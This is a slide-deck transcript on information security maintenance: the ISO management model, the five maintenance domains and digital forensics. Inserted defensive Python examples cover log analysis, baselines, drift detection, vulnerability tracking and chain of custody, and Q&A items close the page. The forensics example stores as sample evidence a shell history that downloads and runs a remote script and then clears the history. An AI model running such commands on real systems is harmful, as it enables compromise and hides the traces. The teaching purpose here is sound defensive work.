What is the objective of the planning and risk assessment domain of the maintenance model?

Presentation on theme: "Information Security Maintenance"— Presentation transcript:

1 Information Security Maintenance
Principles of Information Security Chapter 12

2 Topic Objectives
- The need for ongoing system maintenance
- Security management/maintenance models
- Monitoring the external and internal environments
- Planning and risk assessment
- Vulnerability assessment and remediation
- Readiness and review procedures
- Digital forensics and managing potential evidentiary material


4 Need for Ongoing Maintenance
Things change:
- business priorities
- business partnerships and organizational structure
- employee turnover
- assets
- threats
- vulnerabilities
Ongoing change within the organization and the technology environment must be addressed and integrated into the overall security plan.

5 System Management and Maintenance Models
- ISO Network Management Model: focuses on methods to manage and operate systems; modified here to support the requirements of information security programs
- Security Maintenance Model: focuses on methods to maintain systems

6 Modified ISO Network Management Model
A structured approach to the administration and management of networks and systems, modified to support tasks in information security programs. Five areas:
- Fault Management
- Configuration and Change Management
- Accounting and Auditing Management
- Performance Management
- Security Program Management

7 ISO Model - Fault Management
- Traditional model: technology focus; the process of identifying, tracking, diagnosing, and resolving faults in a system
- Information security model: includes people as well as technology, so nontechnical issues count as faults too
- Identifying faults and remediating them:
  - fault detection: vulnerability assessments, penetration testing
  - fault correction: taking appropriate action to eliminate or mitigate faults
- Monitoring and resolution of user complaints: possible indicators of faults, weaknesses, or intrusions
  - Help desk trouble tickets provide a mechanism for documenting, monitoring and tracking problem resolution, and build a knowledge base of common problems and solutions

8 ISO Model - Configuration and Change Management
Addresses both technical and nontechnical changes.
- Nontechnical change management: maintenance of policies and procedures
- Configuration management: administration of the configuration of the components of the security program
- Change management: administration of changes in the strategy, operation, or components of the information security program

9 ISO Model - Technical Configuration and Change Management
Monitor and administer changes to the technical components of information systems. Four steps of configuration management:
1. Configuration identification: identify and document configuration items
2. Configuration control: administer changes and revisions (by the developing organization)
3. Configuration status accounting: track and record change implementations
4. Configuration audit: audit the configuration management program

10 ISO Model - Accounting and Auditing Management
- Chargeback accounting provides a mechanism for tracking the use of resources and charging internal departments for system use
  - examples: CPU cycle time (rarely used today), computing system resources, network architect and software engineer development time
  - allows recovery of IT expenses from non-IT units
- Accounting management involves monitoring the use of a particular component of a system
- Auditing: review system usage to determine whether misuse or malfeasance has occurred
  - use computer-generated activity logs and log analyzers to detect unusual behavior, hacking attempts, etc.
  - configure duplicate logs and offline storage, so that an intruder who reaches a host cannot silently erase the record of what was done
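The log-analysis bullet above is where auditing actually detects something, so here is a worked example. It is added for this page and is not code from the slides or from the textbook: a parser for OpenSSH-style authentication lines in syslog format and a sliding-window rule that flags any source with five or more failed logins in five minutes, raising the severity when a successful login from the same source follows (the pattern an auditor most wants surfaced). The log lines, hostname and addresses are constructed, and the threshold and window are assumed policy values, not figures from the page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines in OpenSSH/syslog style (not real logs).
# Addresses are taken from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
Mar  3 10:01:02 bastion sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51812 ssh2
Mar  3 10:01:04 bastion sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51813 ssh2
Mar  3 10:01:05 bastion sshd[2203]: Failed password for root from 203.0.113.7 port 51814 ssh2
Mar  3 10:01:07 bastion sshd[2205]: Failed password for root from 203.0.113.7 port 51815 ssh2
Mar  3 10:01:09 bastion sshd[2207]: Failed password for root from 203.0.113.7 port 51816 ssh2
Mar  3 10:01:11 bastion sshd[2209]: Accepted password for root from 203.0.113.7 port 51817 ssh2
Mar  3 10:15:30 bastion sshd[2300]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Mar  3 10:16:02 bastion sshd[2301]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
Mar  3 11:40:00 bastion sshd[2400]: Failed password for bob from 192.0.2.9 port 33000 ssh2
Mar  3 12:40:00 bastion sshd[2401]: Failed password for bob from 192.0.2.9 port 33001 ssh2
Mar  3 12:41:00 bastion CRON[2500]: (root) CMD (run-parts /etc/cron.hourly)
"""

LINE_RE = re.compile(
    r"^(?P<month>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_events(text, year=2024):
    """Turn sshd authentication lines into events; lines from other daemons are skipped.
    Syslog lines carry no year, so one is assumed (a real analyzer takes it from file metadata)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['month']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]})
    return events


def find_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Flag any source with >= threshold failed logins inside a sliding time window.
    A later successful login from a flagged source is upgraded to high severity and
    the account that was used is recorded, because that is the likely compromise."""
    recent = defaultdict(deque)  # src -> timestamps of failures still inside the window
    alerts = {}                  # src -> alert record
    for ev in sorted(events, key=lambda e: e["ts"]):
        src = ev["src"]
        if ev["result"] == "Failed":
            q = recent[src]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:   # expire failures older than the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(src, {"src": src, "first_failure": q[0], "failures": 0,
                                            "severity": "medium", "success_after": None})
                a["failures"] = max(a["failures"], len(q))
        elif src in alerts and alerts[src]["success_after"] is None:
            alerts[src]["success_after"] = ev["user"]
            alerts[src]["severity"] = "high"
    return list(alerts.values())


if __name__ == "__main__":
    for alert in find_brute_force(parse_events(SAMPLE_LOG)):
        print(alert)
```

With the constructed input only 203.0.113.7 is reported: five failures in seven seconds followed by an accepted root password. The single failure from alice and the two failures from bob an hour apart stay below the threshold, which is the point of the sliding window rather than a lifetime count.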

11 ISO Model - Performance Management
- Monitor information security system performance: network devices, firewalls, proxy servers, content filters
- Performance factors to evaluate: memory usage, CPU usage, network traffic, data storage
- Use established performance baselines to:
  - detect abnormal levels of activity, which can indicate an attack or a failure as readily as a load problem
  - identify performance shortfalls that should be addressed by upgrades
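The two uses of a baseline named above are different checks, so here is a worked example of both, added for this page and not code from the slides: a baseline (mean and standard deviation per device and metric) is built from a training window, a new sample is judged abnormal when it lies three standard deviations from that baseline, and a separate capacity check lists devices whose normal level already sits near their limit, which is the upgrade case rather than an incident. The device names, sample values, capacity figures, the 3-sigma rule and the 75 percent utilisation threshold are all constructed assumptions.

```python
from statistics import mean, pstdev

# Constructed hourly samples from a training window, (device, metric) -> values.
# Not real telemetry; the devices are hypothetical.
TRAINING = {
    ("fw-edge-1", "cpu_pct"): [22, 25, 24, 27, 23, 26, 25, 24, 28, 26, 23, 25],
    ("fw-edge-1", "mbps_in"): [310, 290, 330, 305, 295, 320, 315, 300, 325, 310, 298, 312],
    ("proxy-1", "cpu_pct"):   [80, 83, 85, 82, 84, 81, 86, 83, 80, 84, 85, 82],
}
# Assumed hard limits per metric, used only for the capacity (upgrade) check.
CAPACITY = {"cpu_pct": 100.0, "mbps_in": 1000.0}


def build_baseline(samples):
    """Per (device, metric): mean and population standard deviation of the training window."""
    return {key: (mean(vals), pstdev(vals)) for key, vals in samples.items()}


def classify(baseline, device, metric, value, z_alert=3.0):
    """Compare one new sample with its baseline.
    Returns (finding, z): 'abnormal' when the sample is z_alert or more standard
    deviations from the baseline mean, 'unbaselined' when no history exists, else 'normal'."""
    key = (device, metric)
    if key not in baseline:
        return "unbaselined", None
    mu, sigma = baseline[key]
    if sigma == 0:                      # flat history: any movement at all is unusual
        z = 0.0 if value == mu else float("inf")
    else:
        z = (value - mu) / sigma
    return ("abnormal" if abs(z) >= z_alert else "normal"), z


def capacity_shortfalls(baseline, utilisation=0.75):
    """Devices whose normal level already exceeds a fraction of capacity. These are
    not incidents but the candidates for the upgrade planning the slide mentions."""
    out = []
    for (device, metric), (mu, _) in baseline.items():
        limit = CAPACITY.get(metric)
        if limit is not None and mu >= utilisation * limit:
            out.append({"device": device, "metric": metric,
                        "baseline_mean": round(mu, 1), "capacity": limit})
    return out


if __name__ == "__main__":
    base = build_baseline(TRAINING)
    print(classify(base, "fw-edge-1", "cpu_pct", 95))   # spike far outside the baseline
    print(classify(base, "fw-edge-1", "cpu_pct", 26))   # within normal variation
    print(capacity_shortfalls(base))                     # proxy-1 runs at ~83% CPU all day
```

A firewall CPU reading of 95 percent against a baseline of about 25 is flagged as abnormal and goes to the security team to explain; the proxy, whose baseline itself is about 83 percent, never trips the anomaly rule but appears in the shortfall list for the capacity plan. Keeping those two outputs separate stops a chronic undersizing problem from being treated as a daily incident.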

12 ISO Model - Security Program Management
Formal management standards relevant to information security programs (there is a fee to obtain these standards):
- ISO/IEC 27002 (previously ISO 17799): Code of Practice for Information Security Management
- ISO/IEC 27001 (previously BS 7799 Part 2): provides the process model described below
Plan-Do-Check-Act process:
- Plan: perform risk analysis of vulnerabilities
- Do: apply internal controls to manage risk
- Check: perform periodic/frequent reviews to verify effectiveness
- Act: take corrective action on what the reviews find, for example developing incident response plans as necessary

13 Information Security Maintenance Model
Focus on maintaining systems. Five areas/domains:
- External monitoring
- Internal monitoring
- Planning and risk assessment
- Vulnerability assessment and remediation
- Readiness and review

14 Maintenance Model

15 Maintenance Model - Monitoring the External Environment
Goal: maintain awareness of changing external threats.
- Provide early detection of new and emerging threats, threat agents, vulnerabilities, and attacks
- Collect external intelligence from available data sources: CERT web site, vendors, public internet sites
- Provide intelligence context and meaning for use by decision makers within the organization
Characteristics of an effective external monitoring program:
- Creates documented and repeatable procedures
- Provides proper training
- Equips staff with proper access and tools
- Designs criteria and cultivates expertise
- Develops suitable communications methods
- Integrates the incident response plan with the results of the external monitoring process
- Escalates warnings to the internal organization about new threats
Monitoring The External Environment
The objective of the external monitoring domain within the maintenance model is to provide the early awareness of new and emerging threats, threat agents, vulnerabilities, and attacks that is needed to mount an effective and timely defense. External monitoring entails collecting intelligence from data sources and then giving that intelligence context and meaning for use by decision makers within the organization.

16 External Monitoring

17 ISM Model - Monitoring the Internal Environment
Goal: maintain an informed awareness of the state of the organization's networks, systems, and defenses.
Accomplished by:
- Maintaining a complete inventory of the network and IT infrastructure (referred to as characterization of the network)
- Leading the IT governance process so that changes are integrated
- Performing real-time monitoring of IT activity using intrusion detection systems
- Reducing the risk of future attacks by identifying security weaknesses
- Detecting variances introduced to the network or system hardware and software, e.g., by automated difference-detection methods
Monitoring The Internal Environment
It is just as important to monitor the internal environment, that is, the internal computing environment, as the external one. The primary goal of the internal monitoring domain is to maintain an informed awareness of the state of all of the organization's networks, information systems, and information security defenses. This is accomplished by:
- Building and maintaining an inventory of network devices and channels, IT infrastructure and applications, and information security infrastructure elements
- Active participation in, or leadership of, the IT governance process within the organization to integrate the inevitable changes found in all network, IT, and information security programs
- Real-time monitoring of IT activity using intrusion detection systems to detect and initiate responses to specific actions or trends of events that introduce risk to the organization's assets
- Periodic monitoring of the internal state of the organization's networks and systems. This recurring review of the network and system devices that are in line at any given moment, and of any changes to the services offered on the network, is needed to maintain awareness of new and emerging threats. It can be accomplished through automated difference-detection methods that compare the current state against a known baseline and identify variances introduced to the network or system hardware and software.
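The "automated difference-detection" bullet above and the four configuration management steps in slide 9 (identification, control, status accounting, audit) describe the same mechanism from two sides, so one worked example serves both. It is added for this page and is not code from the slides or the textbook: an approved baseline of configuration items (listening services per host plus SHA-256 hashes of controlled files) is compared with what a scan observed, and every difference is then reconciled against the change-control record so that approved changes are separated from unauthorized drift. The hosts, file contents and ticket identifiers are constructed and hypothetical.

```python
import hashlib


def fingerprint(files):
    """SHA-256 per controlled file, computed from its bytes, so that a change in
    content shows up as a change in the recorded configuration item."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


# Approved baseline of configuration items: constructed, hypothetical hosts.
HARDENED_SSHD = b"PasswordAuthentication no\nPermitRootLogin no\n"
BASELINE = {
    "web-01": {"services": {"22/tcp": "openssh", "443/tcp": "nginx"},
               "files": fingerprint({"/etc/ssh/sshd_config": HARDENED_SSHD})},
    "db-01":  {"services": {"22/tcp": "openssh", "5432/tcp": "postgres"},
               "files": fingerprint({"/etc/ssh/sshd_config": HARDENED_SSHD})},
}
# What an automated scan found today (also constructed): a new listener on web-01,
# a weakened sshd_config on web-01, and a host nobody put in the inventory.
CURRENT = {
    "web-01": {"services": {"22/tcp": "openssh", "443/tcp": "nginx", "8080/tcp": "python-http"},
               "files": fingerprint({"/etc/ssh/sshd_config": b"PasswordAuthentication yes\nPermitRootLogin no\n"})},
    "db-01":  BASELINE["db-01"],
    "jump-99": {"services": {"3389/tcp": "rdp"}, "files": {}},
}
# Changes the change-control process has approved: (host, kind, item) -> ticket (hypothetical IDs).
APPROVED = {("web-01", "service", "8080/tcp"): "CHG-1042"}


def diff_snapshots(baseline, current):
    """Configuration audit: every difference between the approved baseline and the
    observed state, at the level of hosts, services and controlled files."""
    findings = []
    for host in sorted(set(baseline) | set(current)):
        if host not in baseline:
            findings.append({"host": host, "kind": "host", "item": None, "change": "added",
                             "detail": sorted(current[host]["services"])})
            continue
        if host not in current:
            findings.append({"host": host, "kind": "host", "item": None, "change": "missing", "detail": None})
            continue
        for key, kind in (("services", "service"), ("files", "file")):
            before, after = baseline[host].get(key, {}), current[host].get(key, {})
            for item in sorted(set(before) | set(after)):
                if item not in before:
                    findings.append({"host": host, "kind": kind, "item": item, "change": "added", "detail": after[item]})
                elif item not in after:
                    findings.append({"host": host, "kind": kind, "item": item, "change": "removed", "detail": before[item]})
                elif before[item] != after[item]:
                    findings.append({"host": host, "kind": kind, "item": item, "change": "changed",
                                     "detail": (before[item], after[item])})
    return findings


def reconcile(findings, approved):
    """Configuration status accounting: a difference backed by an approved change is
    expected; everything else is unauthorized drift to be investigated."""
    for f in findings:
        f["ticket"] = approved.get((f["host"], f["kind"], f["item"]))
        f["status"] = "approved" if f["ticket"] else "unauthorized"
    return findings


if __name__ == "__main__":
    for f in reconcile(diff_snapshots(BASELINE, CURRENT), APPROVED):
        print(f["status"], f["host"], f["kind"], f["item"], f["change"], f.get("ticket") or "")
```

Of the three differences, only the 8080/tcp listener has a ticket behind it; the reopened password authentication on web-01 and the unknown jump-99 host come out as unauthorized, which is exactly the feed the planning and risk assessment domain needs from internal monitoring. Hashing the controlled files rather than storing their contents keeps the baseline small and makes a one-byte change as visible as a rewrite.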

18 Internal Monitoring

19 ISM Model - IT Governance
Goal: increased awareness of the impact of change, translated into a description of the resulting risk through operational risk assessment.
Method: active engagement in an organization-wide IT governance process.
Awareness of change comes from two components of the IT governance process:
- Architecture review boards: provide an orderly introduction of change in information technology
- IT change control process: frequently supervised by a change control committee that ensures awareness of change and integration of information security aspects
The Role of IT Governance
The primary value of active engagement in an organization-wide IT governance process is the increased awareness of the impact of change. This awareness must be translated into a description of the risk that is caused by the change. Such a description is developed in the planning and risk assessment domain as part of operational risk assessment. Awareness of change that flows from IT governance comes from two primary parts of the IT governance process:
- Architecture review boards: many organizations have a group designated for the managed technology planning, review, and approval process that coordinates the acquisition and adoption of new technologies. The group directs the orderly introduction of change in information technology across the organization.
- IT change control process: most organizations of appreciable size have implemented one or more mechanisms to control change in the network, IT infrastructure, and IT applications.

20 ISM Model - Planning and Risk Assessment
- Monitor the entire information security program
- Plan ongoing information security activities to further reduce risk
- Perform risk assessment to identify and document risks introduced by projects and latent risks in the environment
  - document risks introduced by new projects or processes and identify possible controls for these risks
- Uses periodic reviews
- Part of the organization's strategic planning process and annual capital budget planning cycle
Primary goals:
- Establish a formal information security program review process
- Institute formal project identification, selection, planning, and management processes
- Introduce risk assessment and review for all IT projects
- Create a mindset of risk assessment across the organization
Planning And Risk Assessment
The primary objective of the planning and risk assessment domain is to keep an eye on the entire information security program. This is done in part by identifying and planning ongoing information security activities that further reduce risk. Also, the risk assessment group identifies and documents risks introduced by both IT projects and information security projects. Further, it identifies and documents risks that may be latent in the present environment. The primary outcomes from this domain are:
- Establishing a formal information security program review process that complements and supports both the IT planning process and strategic planning processes
- Instituting formal project identification, selection, planning and management processes for information security follow-on activities that augment the current program
- Coordinating with IT project teams to introduce risk assessment and review for all IT projects, so that risks introduced by those projects are identified, documented, and factored into project decisions
- Integrating a mindset of risk assessment across the organization to encourage the performance of risk assessment activities whenever any technology system is implemented or modified

21 Planning and Risk Assessment

22 ISM Model - Vulnerability Assessment and Remediation
Goal: identify specific, documented vulnerabilities and perform timely remediation.
- Use effective vulnerability assessment procedures to collect intelligence about the network, platforms, dial-in modems, and wireless network systems
- Document background information and provide tested remediation procedures for reported vulnerabilities
- Track and report the status of each vulnerability from the time of discovery until it is remediated or the risk is formally accepted
- Communicate information about vulnerabilities, including risk estimates and remediation plans
- Escalate unremediated vulnerabilities to management, and obtain management involvement in the ultimate decision to accept the risk of loss
Vulnerability Assessment And Remediation
The primary goal of the vulnerability assessment and remediation domain is the identification of specific, documented vulnerabilities and their timely remediation. This is accomplished by:
- Using documented vulnerability assessment procedures to safely collect intelligence about the network, platforms, dial-in modems, and wireless network systems
- Documenting background information and providing tested remediation procedures for the reported vulnerabilities
- Tracking, communicating, reporting and escalating to management the itemized facts about the discovered vulnerabilities and the success or failure of the organization to remediate them

23 Vulnerability Assessment Process

24 ISM Model - Remediating Vulnerabilities
Goal: repair the flaw causing a vulnerability instance, or remove (mitigate) the risk from the vulnerability. As a last resort, informed decision makers with the proper authority can accept the risk. A team approach to remediation is the key to success.
Remediation options:
- Acceptance of risk: must be a conscious decision based on full information and a cost-benefit analysis, made by someone with the authority to accept it
- Threat removal (prevention): remove the risk by making the threat impossible to carry out, e.g. using a standalone computer instead of a networked one
- Vulnerability repair: the preferred option when possible; apply patches and updates, or otherwise repair the problem causing the vulnerability
Remediating Vulnerabilities
The objective of remediation is to repair the flaw causing a vulnerability instance or remove the risk from the vulnerability. As a last resort, informed decision makers with the proper authority can accept the risk. When approaching the remediation process, it is important to recognize that building relationships with those who control the information assets is the key to success. Success depends on the organization adopting a team approach to remediation, in place of cross-organizational push and pull.
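Slides 22 and 24 together describe a lifecycle (discovery, tracking, remediation or authorized acceptance, escalation of what is overdue), so one worked example covers both. It is added for this page and is not code from the slides or the textbook: a small vulnerability register in which every finding carries an owner and a severity-based deadline, closure is only by one of the two remediation options or by a risk acceptance that insists on an approver with authority and a written justification, and the escalation report lists what is past its deadline. The SLA days, the roles allowed to accept risk, and the asset and finding identifiers are assumed or constructed, not values from the page.

```python
from dataclasses import dataclass, field
from datetime import date, timedelta

# Assumed remediation deadlines per severity (policy values, not from the page).
SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}
# Roles assumed to hold the authority to accept risk on the organization's behalf.
RISK_ACCEPTANCE_AUTHORITY = {"ciso", "business_owner"}
# The two ways to actually remove a vulnerability (slide 24); acceptance is separate.
REMEDIATION_METHODS = {"repair", "threat_removal"}


@dataclass
class Vulnerability:
    vuln_id: str
    asset: str
    severity: str
    discovered: date
    owner: str
    status: str = "open"                 # open | remediated | accepted
    history: list = field(default_factory=list)

    @property
    def due(self):
        return self.discovered + timedelta(days=SLA_DAYS[self.severity])


class VulnerabilityRegister:
    """Tracks each finding from discovery to closure and produces the escalation list."""

    def __init__(self):
        self.items = {}

    def report(self, vuln_id, asset, severity, discovered, owner):
        v = Vulnerability(vuln_id, asset, severity, discovered, owner)
        v.history.append((discovered, "reported", owner))
        self.items[vuln_id] = v
        return v

    def remediate(self, vuln_id, when, method, note):
        if method not in REMEDIATION_METHODS:
            raise ValueError(f"unknown remediation method {method!r}")
        v = self.items[vuln_id]
        v.status = "remediated"
        v.history.append((when, f"remediated:{method}", note))

    def accept_risk(self, vuln_id, when, approver, approver_role, justification):
        """Risk acceptance is the last resort and must be a conscious, authorized decision:
        the approver must hold the authority and a written justification is mandatory."""
        if approver_role not in RISK_ACCEPTANCE_AUTHORITY:
            raise PermissionError(f"{approver_role} may not accept risk")
        if not justification.strip():
            raise ValueError("risk acceptance requires a documented justification")
        v = self.items[vuln_id]
        v.status = "accepted"
        v.history.append((when, "risk_accepted", f"{approver} ({approver_role}): {justification}"))

    def escalation_report(self, today):
        """Open findings past their deadline, most severe and longest overdue first."""
        order = list(SLA_DAYS)           # severity ranking: critical first
        overdue = [v for v in self.items.values() if v.status == "open" and today > v.due]
        overdue.sort(key=lambda v: (order.index(v.severity), v.due))
        return [{"vuln_id": v.vuln_id, "asset": v.asset, "severity": v.severity,
                 "owner": v.owner, "days_overdue": (today - v.due).days} for v in overdue]


def build_example_register():
    """Constructed register contents used by the demo (hypothetical IDs and assets)."""
    reg = VulnerabilityRegister()
    reg.report("V-1", "web-01", "critical", date(2024, 3, 1), "web-team")
    reg.report("V-2", "db-01", "high", date(2024, 2, 1), "dba")
    reg.remediate("V-2", date(2024, 2, 10), "repair", "vendor patch applied")
    reg.report("V-3", "legacy-app", "medium", date(2024, 1, 15), "app-owner")
    reg.accept_risk("V-3", date(2024, 2, 20), "J. Doe", "business_owner",
                    "app retires in Q3; host isolated on its own VLAN")
    reg.report("V-4", "printer-7", "low", date(2024, 3, 1), "facilities")
    return reg


def demo_escalation(today=date(2024, 3, 20)):
    """What management would see on the given day for the constructed register."""
    return build_example_register().escalation_report(today)


if __name__ == "__main__":
    for row in demo_escalation():
        print(row)
```

On 20 March only V-1 is escalated: it is critical, was due on 8 March and is twelve days overdue. V-2 was repaired, V-3 was accepted by a business owner with a recorded reason, and V-4 is still inside its window. An analyst trying to accept risk on V-1 is refused, which is the "proper authority" requirement of slide 24 enforced by the tool rather than by convention.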

25 ISM Model - Readiness and Review
Goal: keep the program functioning as designed and continuously improving.
Accomplished by:
- Policy review: periodic review and update to provide a current foundation for the information security program
- Readiness review: major planning components should be reviewed on a periodic basis to ensure they are current, accurate, and appropriate
- Rehearsals and war games: rehearse major plan elements to make sure all participants are capable of responding as needed; war games are realistic simulations
Readiness And Review
The primary goal of the readiness and review domain is to keep the information security program functioning as designed and continuously improving over time. This is accomplished by:
- Policy review: sound policy needs to be reviewed and refreshed from time to time to provide a current foundation for the information security program.
- Readiness review: major planning components should be reviewed on a periodic basis to ensure they are current, accurate, and appropriate.
- Rehearsals: when possible, major plan elements should be rehearsed.
Policy review is the primary initiator of the readiness and review domain. As policy is revised or current policy is confirmed, the various planning elements are reviewed for compliance, the information security program is reviewed, and rehearsals are held to make sure all participants are capable of responding as needed.

26 Readiness and Review

27 Digital Forensics
- Digital forensics: investigates what happened during an attack on assets and how the attack occurred
  - Based on the field of traditional forensics
  - Involves the preservation, identification, extraction, documentation, and interpretation of computer media for evidentiary and/or root cause analysis
- Evidentiary material (EM): any information that could potentially support the organization's legal or policy-based case against a suspect
Principles of Information Security, 3rd Edition

28 Digital Forensics (continued)
Used for two key purposes:
- To investigate allegations of digital malfeasance
- To perform root cause analysis
The organization chooses one of two approaches when using digital forensics:
- Protect and forget (patch and proceed): focuses on the defense of data and the systems that house, use, and transmit it
- Apprehend and prosecute (pursue and prosecute): focuses on identification and apprehension of the responsible individuals, with additional attention to the collection and preservation of potential EM that might support administrative or criminal prosecution
Tools:
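The "collection and preservation of potential EM" in the apprehend-and-prosecute approach rests on one practical discipline: hash the material when it is collected, work only on copies, and record every hand-over against that hash. As an added example, not code from the slides or the textbook, here is a minimal chain-of-custody record that does exactly that and refuses a transfer when the bytes no longer match. The evidence content, the people and the timestamps are constructed and hypothetical; the hash algorithm (SHA-256) is the author's choice, not one named on the page.

```python
import hashlib
import json
from datetime import datetime, timezone


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


class EvidenceItem:
    """One piece of potential evidentiary material with its chain-of-custody log.
    The hash taken at collection is the reference every later handler verifies against."""

    def __init__(self, item_id, description, data, collector, collected_at):
        self.item_id = item_id
        self.description = description
        self.reference_hash = sha256_hex(data)
        self.custody = [{"ts": collected_at.isoformat(), "actor": collector,
                         "action": "collected", "hash": self.reference_hash}]

    def verify(self, data):
        """True only if the bytes are exactly what was collected."""
        return sha256_hex(data) == self.reference_hash

    def transfer(self, data, from_actor, to_actor, when, purpose):
        """Record a hand-over. Refuses, and logs the failure, if the material no longer
        matches, so a broken chain is caught at the hand-over rather than in court."""
        if not self.verify(data):
            self.custody.append({"ts": when.isoformat(), "actor": from_actor,
                                 "action": "integrity_failure", "hash": sha256_hex(data)})
            raise ValueError(f"{self.item_id}: hash mismatch, chain of custody broken")
        self.custody.append({"ts": when.isoformat(), "actor": from_actor,
                             "action": f"transferred to {to_actor}",
                             "purpose": purpose, "hash": self.reference_hash})

    def custody_record(self):
        """Serializable record to be stored alongside the evidence."""
        return json.dumps({"item_id": self.item_id, "description": self.description,
                           "sha256": self.reference_hash, "custody": self.custody}, indent=2)


# Constructed evidence: a shell history recovered from a hypothetical compromised host.
EVIDENCE_BYTES = b"wget http://203.0.113.7/x.sh\nchmod +x x.sh\n./x.sh\nhistory -c\n"


def demo():
    """Collect, verify a working copy, hand over intact, then catch a tampered hand-over."""
    t0 = datetime(2024, 3, 3, 14, 5, tzinfo=timezone.utc)
    item = EvidenceItem("EM-0001", "/home/svc/.bash_history from web-01", EVIDENCE_BYTES, "analyst A", t0)
    working_copy = bytes(EVIDENCE_BYTES)            # analysis happens on a copy, never on the original
    item.transfer(EVIDENCE_BYTES, "analyst A", "evidence custodian", t0.replace(hour=16), "secure storage")
    tampered = EVIDENCE_BYTES.replace(b"history -c\n", b"")   # someone "tidied" the file
    try:
        item.transfer(tampered, "evidence custodian", "outside counsel", t0.replace(day=4), "litigation hold")
        chain_broken = False
    except ValueError:
        chain_broken = True
    return {"item": item, "copy_ok": item.verify(working_copy),
            "tampered_ok": item.verify(tampered), "chain_broken": chain_broken}


if __name__ == "__main__":
    result = demo()
    print(result["item"].custody_record())
    print("copy verifies:", result["copy_ok"], "| tampered verifies:", result["tampered_ok"])
```

The record ends with three entries: collection, a clean transfer to the custodian, and an integrity failure on the attempted hand-over of the altered file. Under the protect-and-forget approach the same hashing is still worth doing for root cause analysis, since it proves that what was analysed is what was on the host.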

29 Summary
- Maintenance of the information security program is essential
- Security management models assist in planning for ongoing operations
- It is necessary to monitor the external and internal environments
- Planning and risk assessment are essential parts of information security maintenance
- Understand how vulnerability assessment and remediation tie into information security maintenance
- Understand how to build readiness and review procedures into information security maintenance
- Digital forensics and management of the digital forensics function

What are the five domains of the general information security maintenance model?

The five domains of the security maintenance model are external monitoring, internal monitoring, planning and risk assessment, vulnerability assessment and remediation, and readiness and review.

What is the primary objective of the readiness and review domain of the maintenance model?

The primary goal of the readiness and review domain is to keep the information security program functioning as designed and to keep it continuously improving over time.

What is the primary goal of the vulnerability assessment and remediation domain?

The primary goal of the vulnerability assessment and remediation domain is the identification of specific, documented vulnerabilities and their timely remediation. Vulnerability assessment (also called vulnerability analysis) is the process that identifies, quantifies and analyzes security weaknesses in the IT infrastructure; remediation is the repair of the flaw, the removal of the threat, or, as a last resort, a documented and properly authorized acceptance of the risk.

What are the three primary aspects of information security risk management?

In Principles of Information Security, risk management has three components: risk identification, risk assessment, and risk control. The CIA triad (confidentiality, integrity and availability) is the security model whose properties those controls protect, not the structure of risk management itself.